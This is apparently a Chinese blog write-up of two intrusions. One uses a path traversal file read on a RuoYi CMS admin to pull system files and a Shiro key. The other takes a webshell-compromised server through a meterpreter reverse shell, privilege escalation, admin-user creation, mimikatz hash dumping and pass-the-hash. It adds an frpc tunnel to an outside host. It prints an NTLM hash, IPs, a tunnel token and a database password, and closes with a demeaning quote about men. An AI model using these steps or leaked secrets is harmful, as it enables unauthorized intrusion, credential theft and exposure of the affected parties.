![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/ae08be8c21d3a21a1c6ed15a613f049c.png)

查看源代码发现该网站可能是若依CMS
通过前台注册用户登录后台，测试发现后台存在文件读取漏洞

```
GET/zzadmin/common/download/resource?resource=/profile/../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host:x.x.x.x
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/115.0.5790.110Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=dca9f2db-0b4a-4cdc-8b7d-cdd2e848b569
Connection: close
```
![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/192e1c3ce8a335700eb0ad9c89239908.png)
```
/porc/self/cmdline//当前进程的cmdline参数
/proc/sched_debug 配置文件可以看到当前运行的进程并可以获得对应进程的pid
/proc/pid/cmdline 则可以看到对应pid进程的完整命令行。
/proc/net/fib_trie 内网IP
/proc/self/environ 环境变量
/proc/self/loginuid 当前用户
```
通过文件读取漏洞可以读取目标机器上的一些敏感文件，当然一般情况下首选.bash_history文件，但是由于目标站点可能存在防护导致无法读取，所以这里尝试读取若依的敏感配置文件`application.ym`l和`application-druid.yml`

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/92479d8ef4e5a8c951cc79f9b0e9c176.png)

[https://cnxiaobai.com/articles/2021/04/27/1619527685938.html](https://cnxiaobai.com/articles/2021/04/27/1619527685938.html)
而默认配置文件目录为
`/usr/local/tomcat/webapps/ruoyi-admin/WEB-INF/classes/application-druid.yml`
所以这里大致猜测一下网站的敏感目录为zzadmin/WEB-INF/classes/application-druid.yml，不过前面还需要webapp运行目录
我们首先获取java进程的pid
`/proc/sched_debug`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/08d6eaec02db95d3e3204761806de11e.png)

然后获取java进程的完整命令行

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/134d3fbb260b249070ae4b05d73142a0.png)

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/b0997f002ee084020aa305a42c6f6b1e.png)

获取到webapp目录为/home/tongweb7/deployment，通过查看官方手册发现该目录为应用部署目录

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/559c724eddd54091ab8e343ff97d8265.png)

所以猜测zzadmin就在该目录下，所以进行拼接得到

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/88f2c55e073fbf3533b0481e1148134c.png)

通过读取application.yaml获取到shiro key

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/19333bed31a5837677bf263a7af02918.png)

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/21245d60e57caa94d7be9338adf66d0c.png)

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/83cc6f111fcef069e04d6f85be60d744.png)

记一次若依文件读取漏洞

目标ip:x.x.x.x 阿里云服务器
某小程序利用文件上传拿到webshell，权限很低

![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/234cae4b78050c34aeb21a377d7f51be.png)
考虑提权
借用哥斯拉的反弹shell  ，使用msf来提权
```
root@kali:~# msfconsole 
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 0.0.0.0
msf5 exploit(multi/handler) > set lport 444	4
msf5 exploit(multi/handler) > run
meterpreter > 
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/7d3348615887c11d64358372dfb8dcf4.png)
getsystem  直接提权
getuid  查看当前权限
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/f5d167d8b04cf4c8d8a669cd7c2e91c1.png)
本来试图添加3389用户的
#### 添加用户
```abap
net user test Pass0822.. /add  添加用户名为name，密码为pass
net localgroup Administrators test /add  将用户名为uname的用户添加到管理员组
net user test /del 删除uname用户
```

可惜一直失败，猜测杀软拦截（后文有解释），试图抓取hash
使用msf的load kiwi 
```php
kiwi_cmd sekurlsa::logonpasswords
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/b97276b48bce4a7be51c4b17b72eadca.png)
试图解hash失败了，据说2008以上的服务器都无法直接获取明文密码，_这个时候其实就可以考虑使用msf获得的高权限来开启注册表，进行hash传递登陆_
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/f419400f24ad6503bc296ea71fc2720f.png)
尝试使用gotohttp上线
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/61e386ce5ad5a6cb668c850cd4bc360f.png)
发现仍然需要密码  ，失败

使用msf执行免杀的cs马上线成功，开启vnc 黑屏，两眼一黑
在CS重新尝试添加用户失败，回显发现是因为密码策略问题，为此绕了一大圈
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/ae8b39a5a5eb9c81ce27ea55810855cc.png)
牢记
chcp 65001
如下msf就不会出现乱码
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/db1ff93081914bbb2f1cf7bcaeb60f86.png)
使用test连接上去了，可惜不能直接打开sqlserver
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/346ff840d08b19bb62155edeb3200829.png)
两个想法
一：hash传递登录到admin
二：上传免杀的frpc上去，将目标1433端口代理出来，使用navicat连接


### 一：hash传递登录到admin
#### 修改目标注册表，开启hash传递
```
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f 
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/9b1528b8087c5f33f8a0d7d4cd17bf61.png)
```
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/992047dc29f885b2fed2301156ee3cd9.png)
#### 利用 mimikatz  输入下面命令
```
privilege::debug

sekurlsa::pth /user:administrator /domain:47.97.90.1 /ntlm:d23ac23671cda20a435ee35fd48464a8 "/run:mstsc.exe /restrictedadmin"
```
### ![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/e7b1245919112f6b481f76c07d4dc9ba.png)
成功登录
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/79aa8ccb2c54f8f2cdde77ffdc7a1847.png)
### 二：上传免杀的frpc上去，将目标1433端口代理出来，使用navicat连接
#### frpc配置如下
```
[common]
server_addr = 172.245.17.142
server_port = 8008
token = SCJTxrVIJZWcfiND

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 1433
remote_port = 1433
```
将目标数据库代理出来，配合从账号密码使用navicat连接
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/754f95ea92bb6cb568706401704c965c.png)


#从config网站配置文件中翻到数据库密码
```
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <configSections>
    </configSections>
    <connectionStrings>
        <add name="WeiXinAdminForm.Properties.Settings.WeiXinAdminConnectionString"
            connectionString="Data Source=.;Initial Catalog=WeiXinAdmin;Persist Security Info=True;User ID=changex;Password=Wzl880626..."
            providerName="System.Data.SqlClient" />
    </connectionStrings>
    <startup> 
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
    </startup>
</configuration>
```


> 如果一个男人懦弱逃避/没有主见（主体认知全是外部规则灌输的结果）/从众。 我想他 
> 一辈子都没有被善待/培养过。 所有人都知道对于一个雄性，这种状态约等于报废了，不 管怎么主观合理化都无法改变这个客观现实。 但是我很同情他，因为我知道，只有最恶毒 的改造，才会产生最悲催的结局。   --每日一句